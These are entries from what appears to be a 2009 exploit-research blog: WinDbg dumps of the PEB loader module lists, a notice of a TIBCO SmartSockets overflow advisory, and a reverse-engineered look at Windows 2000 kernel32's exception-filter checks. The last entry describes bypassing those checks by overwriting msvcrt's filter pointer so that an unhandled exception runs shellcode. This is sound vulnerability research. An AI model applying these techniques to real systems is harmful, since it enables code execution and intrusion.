745d0000 7476c000 COMCTL32 (pdb symbols)
74b50000 74b59000 VERSION (pdb symbols)
755a0000 755ac000 CRYPTBASE (pdb symbols)
756d0000 75718000 KERNELBASE (pdb symbols)
75950000 7596f000 IMM32 (pdb symbols)
75970000 759ff000 OLEAUT32 (pdb symbols)
75a00000 75ac9000 USER32 (pdb symbols)
75ae0000 75bac000 MSCTF (pdb symbols)
75d60000 75e02000 RPCRT4 (pdb symbols)
75e60000 75f0c000 msvcrt (pdb symbols)
75f50000 75ff0000 ADVAPI32 (pdb symbols)
75ff0000 7608d000 USP10 (pdb symbols)
76090000 76113000 CLBCatQ (pdb symbols)
76120000 7627b000 ole32 (pdb symbols)
76280000 762d7000 SHLWAPI (pdb symbols)
763e0000 77026000 SHELL32 (pdb symbols)
77030000 77049000 sechost (pdb symbols)
77050000 77124000 kernel32 (pdb symbols)
77160000 771ae000 GDI32 (pdb symbols)
77500000 7763c000 ntdll (pdb symbols)
77720000 7772a000 LPK (pdb symbols)

// dump the PEB...

0:004> !peb
PEB at 7ffdc000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
BeingDebugged: Yes
ImageBaseAddress: 00d20000
Ldr 775d7880
Ldr.Initialized: Yes
Ldr.InInitializationOrderModuleList: 00221a28 . 002b13a0
Ldr.InLoadOrderModuleList: 00221988 . 002b1390
Ldr.InMemoryOrderModuleList: 00221990 . 002b1398
...

// show the Ldr.InInitializationOrderModuleList
// dump the first entry...
0:004> dd 00221a28
00221a28 00221e68 775d789c 77500000 00000000 // 77500000 = ntdll.dll
00221a38 0013c000 003c003a 002218e8 00140012
00221a48 7756835c 00004004 0000ffff 775da680
00221a58 775da680 49eea66e 00000000 00000000
// dump the second entry...
0:004> dd 00221e68
00221e68 00221d50 00221a28 756d0000 756d8005 // 756d0000 = KERNELBASE.dll
00221e78 00048000 00460044 00221df8 001e001c
00221e88 00221e20 00084004 0000ffff 0022a9b4
00221e98 775da690 49eea60f 00000000 00000000
// we can see the second entry is for kernelbase.dll and not kernel32.dll

// show the Ldr.InMemoryOrderModuleList
// dump the first entry...
0:004> dd 00221990
00221990 00221a20 775d7894 00000000 00000000
002219a0 00d20000 00d30140 000c0000 003a0038 // 00d20000 = calc.exe
002219b0 002217fa 00120010 00221822 00004000
002219c0 0000ffff 00222b84 775da6a8 49ee917f
// dump the second entry...
0:004> dd 00221a20
00221a20 00221d48 00221990 00221e68 775d789c
00221a30 77500000 00000000 0013c000 003c003a // 77500000 = ntdll.dll
00221a40 002218e8 00140012 7756835c 00004004
00221a50 0000ffff 775da680 775da680 49eea66e
// dump the third entry...
0:004> dd 00221d48
00221d48 00221e60 00221a20 002227e8 00221e68
00221d58 77050000 770a102d 000d4000 00420040 // 77050000 = kernel32.dll
00221d68 00221ce0 001a0018 00221d08 00084004
00221d78 0000ffff 002248a4 775da640 49eea60e
// we can see the third entry is for kernel32.dll

Tuesday, 28 April 2009

TIBCO SmartSockets Stack Buffer Overflow Vulnerability

iDefense have published an advisory for a critical remote pre-authentication code execution vulnerability (CVE-2009-1291) in the TIBCO SmartSockets framework which was discovered by Stephen Fewer of Harmony Security. The effected components are as follows:

  • TIBCO SmartSockets®
  • TIBCO SmartSockets® Product Family Modules (formerly RTworks)
  • TIBCO Enterprise Message Service™

You can read the full iDefense advisory here:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=785

And the three TIBCO advisories here:
http://www.tibco.com/multimedia/security_advisory_smartsockets_tcm8-7560.txt
http://www.tibco.com/multimedia/security_advisory_rtworks_tcm8-7559.txt
http://www.tibco.com/multimedia/security_advisory_ems_tcm8-7558.txt

Saturday, 7 March 2009

Windows 2000 UEF Overwrite Oddity

After firing up an old Windows 2000 SP4 VM during the week to code up a heap overflow PoC, I came across a small oddity when attempting to gain code execution by overwriting kernel32's top level Unhandled Exception Filter (Halvar Flake - Third Generation Exploitation) after I had run Windows Update.

Previously, overwriting kernel32's top level UEF would give you control after an unhandled exception occurred, however this didn't seem to be working as it previously had done.

After digging around kernel32!SetUnhandledExceptionFilter and kernel32!UnhandledExceptionFilter in the current kernel32 version (5.00.2195.7135) and a previous one (5.00.2195.7006) it seems MS changed the way kernel32 accesses the top level UEF. Previously the UEF was set and handled as shown in the summarized snippet below:

// as seen in kernel32.dll (5.00.2195.7006)

LP_UEF pTopLevelExceptionFilter;

LP_UEF SetUnhandledExceptionFilter( LP_UEF lpNewFilter )
{
  pTopLevelExceptionFilter = lpNewFilter;
  return pTopLevelExceptionFilter;
}

DWORD UnhandledExceptionFilter( LP_EXCEPTION_POINTERS lpExceptionInfo )
{
  // ...

  if( NtQueryInformationProcess( GetCurrentProcess(), ProcessDebugPort, &dwDebugged, 4, NULL ) >= NULL )
    return 0;

  if( dwDebugged != NULL )
    return 0;

  if ( pTopLevelExceptionFilter != NULL )
  {
    dwResult = pTopLevelExceptionFilter( lpExceptionInfo );
    if( dwResult == 1 || dwResult == -1 )
      return dwResult;
  }

  // ...
}

We can see that as long as the current process is not being debugged and the top level UEF is not NULL it will be executed, so if we patch the UEF address before an exception we can get control. However the latest kernel32 sets and handles its top level UEF differently as shown in the summarized snippet below:

// as seen in kernel32.dll (5.00.2195.7135)

typedef struct _module_info
{
  HANDLE hModule; // The base address of the module which owns the UEF
  DWORD Type; // The UEF's memory region Type as set by VirtualQuery()
  DWORD RegionSize;// The UEF's memory region size as set by VirtualQuery()
  WCHAR ModuleFileName[260]; // The name of the module which owns the UEF
} ModuleInfo;

LP_UEF pTopLevelExceptionFilter;

ModuleInfo SavedUEF;

ModuleInfo * pCurrentEUF;

LP_UEF SetUnhandledExceptionFilter( LP_UEF lpNewFilter )
{
  ModuleInfo NewUEF;

  // ...

  // get some meta data about this new UEF
  GetExceptionFilterModuleInfo( lpNewFilter, &NewUEF ) );

  // ...

  // alloc this buffer for use later in UnhandledExceptionFilter()
  pCurrentEUF = RtlAllocateHeap( hHeapHandle, dwFlags, 532 );

  // save this meta data for later
  memcpy( &SavedUEF, &NewUEF, 532 );

  // set the new UEF
  pTopLevelExceptionFilter = lpNewFilter;

  // ...
}

DWORD UnhandledExceptionFilter( LP_EXCEPTION_POINTERS lpExceptionInfo )
{
  // ...

  if( NtQueryInformationProcess( GetCurrentProcess(), ProcessDebugPort, &dwDebugged, 4, NULL ) >= NULL )
    return 0;

  if( dwDebugged != NULL )
    return 0;

  if( pTopLevelExceptionFilter != NULL )
  {
    if( pCurrentEUF != NULL )
    {
      // get the meta data for the current UEF
      if( GetExceptionFilterModuleInfo( pTopLevelExceptionFilter, pCurrentEUF ) )
      {
        // compare the current meta data to the saved meta data
        if( pCurrentEUF->hModule == SavedUEF.hModule )
        {
          if( pCurrentEUF->RegionSize == SavedUEF.RegionSize )
          {
            if( pCurrentEUF->Type == SavedUEF.Type )
            {
              if( pCurrentEUF->Type & SEC_IMAGE )
              {
                bExecute = wcscmp( pCurrentEUF->ModuleFileName, SavedUEF.ModuleFileName) == 0;
              }
              else
              {
                bExecute = TRUE;
              }
              if( bExecute )
              {
                result = pTopLevelExceptionFilter( lpExceptionInfo );
                if ( result == 1 || result == -1 )
                  return result;
              }
            }
          }
        }
      }
    }
  }
  // ...
}

We can see that when an application now sets a top level UEF via SetUnhandledExceptionFilter(), some meta data about the new UEF is recorded, including the module name where the new UEF lies, the module handle (equal to the modules base address), as well as the size and type of the memory block where the UEF lives, as returned by a call to VirtualQuery().

Later when UnhandledExceptionFilter() attempts to execute the top level UEF it first double checks that the saved UEF meta data is equal to the current UEF's meta data. If it is the top level UEF is called.

A problem then arises after we patch kernel32's top level UEF. When UnhandledExceptionFilter() is called the meta data won't match up and our patched UEF will not be called. We could look for a suitable address in the same memory region as the original one so as to satisfy these checks, however there is an easier way around it.

By default most processes have their kernel32's top level UEF set to msvcrt!__CxxUnhandledExceptionFilter. This function in turn will call an exception filter whose address is stored in a fixed location (0x7803A148 in msvcrt.dll 6.10.9844.0). Simply patching this location with our arbitrary address will allow us to ignore the checks in kernel32 and gain control after an unhandled exception. For a typical heap overflow we can get back to our shellcode via a 'CALL [ESI+0x4C]'.